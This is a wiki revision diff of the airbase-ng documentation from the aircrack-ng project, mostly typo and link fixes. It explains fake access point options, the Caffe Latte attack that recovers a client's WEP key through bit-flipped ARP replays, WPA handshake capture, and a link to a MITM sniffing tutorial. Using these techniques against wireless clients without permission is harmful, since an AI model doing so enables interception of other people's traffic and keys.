Both sides previous revisionPrevious revisionNext revision | Previous revision |
airbase-ng [2010/03/07 23:36] – Fixed typo darkaudax | airbase-ng [2018/03/11 18:54] (current) – Updated link to issue mister_x |
---|
==== -q Quiet Flag ==== | ==== -q Quiet Flag ==== |
| |
This surpresses printing any statistics or status information. | This suppresses printing any statistics or status information. |
| |
==== -v Verbose Flag ==== | ==== -v Verbose Flag ==== |
==== -s Force Shared Key Authentication ==== | ==== -s Force Shared Key Authentication ==== |
| |
When specfiied, this forces shared key authentication for all clients. | When specified, this forces shared key authentication for all clients. |
| |
The soft AP will send an "authentication method unsupported" rejection to any open system | The soft AP will send an "authentication method unsupported" rejection to any open system |
==== -L Caffe Latte Attack ==== | ==== -L Caffe Latte Attack ==== |
| |
Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6". It can be used with "-L" or "--caffe-latte". This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explaination of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is. It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from. The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. | Airbase-ng also contains the new caffe-latte attack, which is also implemented in aireplay-ng as attack "-6". It can be used with "-L" or "--caffe-latte". This attack specifically works against clients, as it waits for a broadcast arp request, which happens to be a gratuitous arp. See [[http://wiki.wireshark.org/Gratuitous_ARP|this]] for an explanation of what a [[http://wiki.wireshark.org/Gratuitous_ARP|gratuitous arp]] is. It then flips a few bits in the sender MAC and IP, corrects the ICV (crc32) value and sends it back to the client, where it came from. The point why this attack works in practice is, that at least windows sends gratuitous arps after a connection on layer 2 is established and a static ip is set, or dhcp fails and windows assigned an IP out of 169.254.X.X. |
| |
"-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests. Airodump-ng is needed to capture the replys. | "-x <pps>" sets the number of packets per second to send when performing the caffe-latte attack. At the moment, this attack doesn't stop, it continuously sends arp requests. Airodump-ng is needed to capture the replys. |
| |
==== -y Disable Broadcast Probes ==== | ==== -y Disable Broadcast Probes ==== |
When using this option, the fake AP will not respond to broadcast probes. A broadcast probe is where the the specific AP is not identified uniquely. Typically, most APs will respond with probe responses to a broadcast probe. This flag will prevent this happening. It will only respond when the specific AP is uniquely requested. | When using this option, the fake AP will not respond to broadcast probes. A broadcast probe is where the specific AP is not identified uniquely. Typically, most APs will respond with probe responses to a broadcast probe. This flag will prevent this happening. It will only respond when the specific AP is uniquely requested. |
| |
==== -0 Set WPA/WEP Tags ==== | ==== -0 Set WPA/WEP Tags ==== |
* -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) | * -d 00:06:62:F8:1E:2C filters the data captured to fake AP MAC (this is optional) |
* -w specifies the file name prefix of the captured data | * -w specifies the file name prefix of the captured data |
* ath0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on |
| |
Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: | Here is what the window looks like when airbase-ng has received a packet from the client and has successfully started the attack: |
==== Caffe Latte Attack in Access Point mode ==== | ==== Caffe Latte Attack in Access Point mode ==== |
| |
This attack obtains the WEP key from a client. It depends on receiving at least one gratutitous ARP request from the client after it has associated with the fake AP. | This attack obtains the WEP key from a client. It depends on receiving at least one gratuitous ARP request from the client after it has associated with the fake AP. |
| |
Enter: | Enter: |
| |
* -c 9 specifies the channel | * -c 9 specifies the channel |
* -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC. It is MAC of card running the the fake AP. This is optional. | * -d 00:C0:C6:94:F4:87 filters the data captured to fake AP MAC. It is MAC of card running the fake AP. This is optional. |
* -w specifies the file name of the captured data | * -w specifies the file name of the captured data |
* wlan0 specifies the wireless interface to capture data on | * wlan0 specifies the wireless interface to capture data on |
| |
When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: | When the client connects, notice the "WPA handshake: 00:C0:C6:94:F4:87" in the top right-hand corner of the screen below: |
| |
CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 | CH 9 ][ Elapsed: 5 mins ][ 2008-03-21 10:26 ][ WPA handshake: 00:C0:C6:94:F4:87 |
| |
| |
In all cases, bit flipping is used to ensure the CRC is correct. Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. | In all cases, bit flipping is used to ensure the CRC is correct. Additionally, bit flipping is used to ensure the source MAC of the ARP contained within the fragmented packet is not multicast. |
| |
| ==== SoftAP with Internet connection and MITM sniffing ==== |
| |
| This [[http://forum.aircrack-ng.org/index.php?topic=7172.0|forum thread]] provides a tutorial for SoftAP with Internet connection and MITM sniffing. |
| |
| |
===== Usage Troubleshooting ===== | ===== Usage Troubleshooting ===== |
==== Broken SKA error message ==== | ==== Broken SKA error message ==== |
| |
You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail. This message indicates the number of bytes actually received was different that the number requested. Either don't use the option or try different values of "-S" to see which one elminates the error. | You receive "Broken SKA: <MAC address> (expected: ??, got ?? bytes)" or similar. When using the "-S" option with values different then 128, some clients fail. This message indicates the number of bytes actually received was different that the number requested. Either don't use the option or try different values of "-S" to see which one eliminates the error. |
| |
==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== | ==== "write failed: Message too long" / "wi_write(): Illegal seek" error messages ==== |
| |
See this [[http://trac.aircrack-ng.org/ticket/469|trac ticket]] for a workaround. The trac ticket explains the root cause and how to adjust the MTU to avoid the problem. | See this [[https://github.com/aircrack-ng/aircrack-ng/issues/469|GitHub issue]] for a workaround. The issue explains the root cause and how to adjust the MTU to avoid the problem. |
| |
==== Error creating tap interface: Permission denied ==== | ==== Error creating tap interface: Permission denied ==== |